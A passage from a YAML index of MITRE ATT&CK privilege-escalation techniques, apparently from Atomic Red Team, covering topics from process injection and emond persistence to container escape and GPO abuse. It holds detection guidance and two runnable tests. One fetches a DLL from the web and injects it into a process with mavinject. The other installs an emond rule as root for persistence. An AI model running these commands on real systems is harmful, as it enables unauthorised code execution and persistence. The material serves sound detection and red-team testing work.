x_mitre_permissions_required: + - User + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread and those that can be used to modify + memory within another process, such as VirtualAllocEx/WriteProcessMemory, + may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor + DLL/PE file events, specifically creation of these binary files as well as + the loading of DLLs into processes. Look for DLLs that are not recognized + or not normally loaded into a process. \n\nAnalyze process behavior to determine + if a process is performing actions it usually does not, such as opening network + connections, reading files, or other suspicious actions that could relate + to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1055.001 + atomic_tests: + - name: Process Injection via mavinject.exe + auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 + description: | + Windows 10 Utility To Inject DLLS. + + Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. + With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + supported_platforms: + - windows + input_arguments: + process_id: + description: PID of input_arguments + type: Integer + default: "(Start-Process notepad -PassThru).id" + dll_payload: + description: DLL to Inject + type: Path + default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll + dependency_executor_name: powershell + dependencies: + - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) + +' + prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" + executor: + command: | + $mypid = #{process_id} + mavinject $mypid /INJECTRUNNING #{dll_payload} + name: powershell + elevation_required: true + T1548.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.004 + url: https://attack.mitre.org/techniques/T1548/004 + - source_name: AppleDocs AuthorizationExecuteWithPrivileges + url: https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg + description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. + Retrieved August 8, 2019. + - source_name: Death by 1000 installers; it's all broken! + url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 + description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. + Retrieved August 8, 2019. + - source_name: Carbon Black Shlayer Feb 2019 + url: https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ + description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS + Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. + - source_name: OSX Coldroot RAT + url: https://objective-see.com/blog/blog_0x2A.html + description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected + (OSX)Coldroot RAT. Retrieved August 8, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Elevated Execution with Prompt + description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges + API to escalate privileges by prompting the user for credentials.(Citation: + AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to + give application developers an easy way to perform operations with root privileges, + such as for application installation or updating. This API does not validate + that the program requesting root privileges comes from a reputable source + or has been maliciously modified. \n\nAlthough this API is deprecated, it + still fully functions in the latest releases of macOS. When calling this API, + the user will be prompted to enter their credentials but no checks on the + origin or integrity of the program are made. The program calling the API may + also load world writable files which can be modified to perform malicious + behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges + to obtain root privileges in order to install malicious software on victims + and install persistence mechanisms.(Citation: Death by 1000 installers; it's + all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot + RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) + to trick the user into granting escalated privileges to malicious code.(Citation: + Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer + Feb 2019) This technique has also been shown to work by modifying legitimate + programs present on the machine that make use of this API.(Citation: Death + by 1000 installers; it's all broken!)" + id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T12:04:37.823Z' + created: '2020-01-30T14:40:20.187Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline + executions which may indicate that AuthorizationExecuteWithPrivileges + is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges + is being called. Monitoring OS API callbacks for the execution can also be + a way to detect this behavior but requires specialized security tooling. + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Jimmy Astle, @AstleJimmy, Carbon Black + - Erika Noerenberg, @gutterchurl, Carbon Black + x_mitre_platforms: + - macOS + atomic_tests: [] + T1546.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.014 + url: https://attack.mitre.org/techniques/T1546/014 + - source_name: xorrior emond Jan 2018 + url: https://www.xorrior.com/emond-persistence/ + description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For + Persistence. Retrieved September 10, 2019. + - source_name: magnusviri emond Apr 2016 + url: http://www.magnusviri.com/Mac/what-is-emond.html + description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September + 10, 2019. + - source_name: sentinelone macos persist Jun 2019 + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. + Retrieved September 10, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Emond + description: |- + Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. + + The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) + + Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. + id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:37:25.307Z' + created: '2020-01-24T15:15:13.426Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Monitor emond rules creation by checking for files created + or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Ivan Sinyakov + x_mitre_platforms: + - macOS + identifier: T1546.014 + atomic_tests: + - name: Persistance with Event Monitor - emond + auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) + daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + +' + supported_platforms: + - macos + input_arguments: + plist: + description: Path to attacker emond plist file + type: path + default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist + executor: + command: | + sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist + sudo touch /private/var/db/emondClients/T1546.014 + cleanup_command: | + sudo rm /etc/emond.d/rules/T1546.014_emond.plist + sudo rm /private/var/db/emondClients/T1546.014 + name: sh + elevation_required: true + T1611: + technique: + external_references: + - source_name: mitre-attack + external_id: T1611 + url: https://attack.mitre.org/techniques/T1611 + - source_name: Docker Overview + url: https://docs.docker.com/get-started/overview/ + description: Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. + - source_name: Docker Bind Mounts + url: https://docs.docker.com/storage/bind-mounts/ + description: Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. + - source_name: Trend Micro Privileged Container + url: https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html + description: Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged + Container in Docker is a Bad Idea. Retrieved March 30, 2021. + - source_name: Intezer Doki July 20 + url: https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ + description: 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: + Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Escape to Host + description: |- + Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) + + There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. + id: attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-22T16:14:59.756Z' + created: '2021-03-30T17:38:34.277Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - Administrator + - User + - root + x_mitre_detection: Monitor for the deployment of suspicious or unknown container + images and pods in your environment, particularly containers running as root. + Additionally, monitor for unexpected usage of syscalls such as mount + (as well as resulting process activity) that may indicate an attempt to escape + from a privileged container to host. In Kubernetes, monitor for cluster-level + events associated with changing containers' volume configurations. + x_mitre_contributors: + - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics + - Alfredo Oliveira, Trend Micro + - David Fiser, @anu4is, Trend Micro + - Idan Frimark, Cisco + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + x_mitre_platforms: + - Windows + - Linux + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Process: OS API Execution' + - 'Process: Process Creation' + atomic_tests: [] + T1546: + technique: + id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db + description: "Adversaries may establish persistence and/or elevate privileges + using system mechanisms that trigger execution based on specific events. Various + operating systems have means to monitor and subscribe to events such as logons + or other user activity such as running specific applications/binaries. \n\nAdversaries + may abuse these mechanisms as a means of maintaining persistent access to + a victim via repeatedly executing malicious code. After gaining access to + a victim system, adversaries may create/modify event triggers to point to + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, + such as SYSTEM or service accounts, an adversary may be able to abuse these + triggered execution mechanisms to escalate their privileges. " + name: Event Triggered Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546 + url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. + source_name: amnesia malware + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.610Z' + created: '2020-01-22T21:04:23.285Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + - 'WMI: WMI Creation' + - 'File: File Metadata' + - 'Module: Module Load' + x_mitre_detection: "Monitoring for additions or modifications of mechanisms + that could be used to trigger event-based execution, especially the addition + of abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network. Also look for changes that do + not line up with updates, patches, or other planned administrative activity. + \n\nThese mechanisms may vary by OS, but are typically stored in central repositories + that store configuration information such as the Windows Registry, Common + Information Model (CIM), and/or specific named files, the last of which can + be hashed and compared to known good values. \n\nMonitor for processes, API/System + calls, and other common ways of manipulating these event repositories. \n\nTools + such as Sysinternals Autoruns can be used to detect changes to execution triggers + that could be attempts at persistence. Also look for abnormal process call + trees for execution of other commands that could relate to Discovery actions + or other techniques. \n\nMonitor DLL loads by processes, specifically looking + for DLLs that are not recognized or not normally loaded into a process. Look + for abnormal process behavior that may be due to a process loading a malicious + DLL. Data and events should not be viewed in isolation, but as part of a chain + of behavior that could lead to other activities, such as making network connections + for Command and Control, learning details about the environment through Discovery, + and conducting Lateral Movement. " + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + atomic_tests: [] + T1574.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.005 + url: https://attack.mitre.org/techniques/T1574/005 + - source_name: mozilla_sec_adv_2012 + url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ + description: Robert Kugler. (2012, November 20). Mozilla Foundation Security + Advisory 2012-98. Retrieved March 10, 2017. + - source_name: Executable Installers are Vulnerable + url: https://seclists.org/fulldisclosure/2015/Dec/34 + description: 'Stefan Kanthak. (2015, December 8). Executable installers are + vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation + of privilege. Retrieved December 4, 2014.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Executable Installer File Permissions Weakness + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-26T19:20:23.030Z' + created: '2020-03-13T11:12:18.558Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - Administrator + - User + - SYSTEM + x_mitre_detection: |- + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1068: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1068 + url: https://attack.mitre.org/techniques/T1068 + - source_name: ESET InvisiMole June 2020 + url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf + description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE + HIDDEN PART OF THE STORY. Retrieved July 16, 2020.' + - source_name: Unit42 AcidBox June 2020 + url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ + description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare + Malware Repurposing Turla Group Exploit Targeted Russian Organizations. + Retrieved March 16, 2021.' + - source_name: Microsoft Driver Block Rules + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules + description: Microsoft. (2020, October 15). Microsoft recommended driver block + rules. Retrieved March 16, 2021. + description: |- + Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. + + When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods. + + Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570). + name: Exploitation for Privilege Escalation + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-22T16:13:34.896Z' + created: '2017-05-31T21:30:55.066Z' + x_mitre_contributors: + - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics + - Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security + - Idan Revivo, @idanr86, Team Nautilus Aqua Security + x_mitre_version: '1.3' + x_mitre_data_sources: + - 'Driver: Driver Load' + x_mitre_detection: |- + Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules) + + Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges. + x_mitre_effective_permissions: + - User + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_is_subtechnique: false + atomic_tests: [] + T1055.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.011 + url: https://attack.mitre.org/techniques/T1055/011 + - url: https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx + description: Microsoft. (n.d.). About Window Classes. Retrieved December 16, + 2017. + source_name: Microsoft Window Classes + - url: https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx + description: Microsoft. (n.d.). GetWindowLong function. Retrieved December + 16, 2017. + source_name: Microsoft GetWindowLong function + - url: https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx + description: Microsoft. (n.d.). SetWindowLong function. Retrieved December + 16, 2017. + source_name: Microsoft SetWindowLong function + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html + description: MalwareTech. (2013, August 13). PowerLoader Injection – Something + truly amazing. Retrieved December 16, 2017. + source_name: MalwareTech Power Loader Aug 2013 + - url: https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ + description: Matrosov, A. (2013, March 19). Gapz and Redyms droppers based + on Power Loader code. Retrieved December 16, 2017. + source_name: WeLiveSecurity Gapz and Redyms Mar 2013 + - url: https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx + description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December + 16, 2017. + source_name: Microsoft SendNotifyMessage function + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Extra Window Memory Injection + description: "Adversaries may inject malicious code into process via Extra Window + Memory (EWM) in order to evade process-based defenses as well as possibly + elevate privileges. EWM injection is a method of executing arbitrary code + in the address space of a separate live process. \n\nBefore creating a window, + graphical Windows-based processes must prescribe to or register a windows + class, which stipulate appearance and behavior (via windows procedures, which + are functions that handle input/output of data).(Citation: Microsoft Window + Classes) Registration of new windows classes can include a request for up + to 40 bytes of EWM to be appended to the allocated memory of each instance + of that class. This EWM is intended to store data specific to that window + and has specific application programming interface (API) functions to set + and get its value. (Citation: Microsoft GetWindowLong function) (Citation: + Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough + to store a 32-bit pointer and is often used to point to a windows procedure. + Malware may possibly utilize this memory location in part of an attack chain + that includes writing code to shared sections of the process’s memory, placing + a pointer to the code in EWM, then invoking execution by returning execution + control to the address in the process’s EWM.\n\nExecution granted through + EWM injection may allow access to both the target process's memory and possibly + elevated privileges. Writing payloads to shared sections also avoids the use + of highly monitored API calls such as WriteProcessMemory and + CreateRemoteThread.(Citation: Elastic Process Injection July + 2017) More sophisticated malware samples may also potentially bypass protection + mechanisms such as data execution prevention (DEP) by triggering a combination + of windows procedures and other system functions that will rewrite the malicious + payload inside an executable portion of the target process. (Citation: MalwareTech + Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning + code in the context of another process may allow access to the process's memory, + system/network resources, and possibly elevated privileges. Execution via + EWM injection may also evade detection from security products since the execution + is masked under a legitimate process. " + id: attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:31.004Z' + created: '2020-01-14T17:18:32.126Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_detection: 'Monitor for API calls related to enumerating and manipulating + EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and + SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated + with this technique have also used SendNotifyMessage (Citation: Microsoft + SendNotifyMessage function) to trigger the associated window procedure and + eventual malicious injection. (Citation: Elastic Process Injection July 2017)' + x_mitre_data_sources: + - 'Process: OS API Execution' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1484.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1484.001 + url: https://attack.mitre.org/techniques/T1484/001 + - source_name: TechNet Group Policy Basics + url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ + description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: + Understanding the Structure of a Group Policy Object. Retrieved March 5, + 2019.' + - source_name: ADSecurity GPO Persistence 2016 + url: https://adsecurity.org/?p=2716 + description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence + #17: Group Policy. Retrieved March 5, 2019.' + - source_name: Wald0 Guide to GPOs + url: https://wald0.com/?p=179 + description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and + OUs. Retrieved March 5, 2019. + - source_name: Harmj0y Abusing GPO Permissions + url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/ + description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved + March 5, 2019. + - source_name: Mandiant M Trends 2016 + url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf + description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved + March 5, 2019. + - source_name: Microsoft Hacking Team Breach + url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ + description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach: + A Cyber Jurassic Park. Retrieved March 5, 2019.' + - source_name: Harmj0y SeEnableDelegationPrivilege Right + url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ + description: Schroeder, W. (2017, January 10). The Most Dangerous User Right + You (Probably) Have Never Heard Of. Retrieved March 5, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Group Policy Modification + description: "Adversaries may modify Group Policy Objects (GPOs) to subvert + the intended discretionary access controls for a domain, usually with the + intention of escalating privileges on the domain. Group policy allows for + centralized management of user and computer settings in Active Directory (AD). + GPOs are containers for group policy settings made up of files stored within + a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: + TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike + other objects in AD, GPOs have access controls associated with them. By default + all user accounts in the domain have permission to read GPOs. It is possible + to delegate GPO access control permissions, e.g. write access, to specific + users or groups in the domain.\n\nMalicious GPO modifications can be used + to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), + [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), + [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create + Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), + \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide + to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends + 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many + user and machine settings in the AD environment, there are a great number + of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide + to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask + can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) + by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: + Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases + an adversary might modify specific user rights like SeEnableDelegationPrivilege, + set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, + to achieve a subtle AD backdoor with complete control of the domain because + the user account under the adversary's control would then be able to modify + 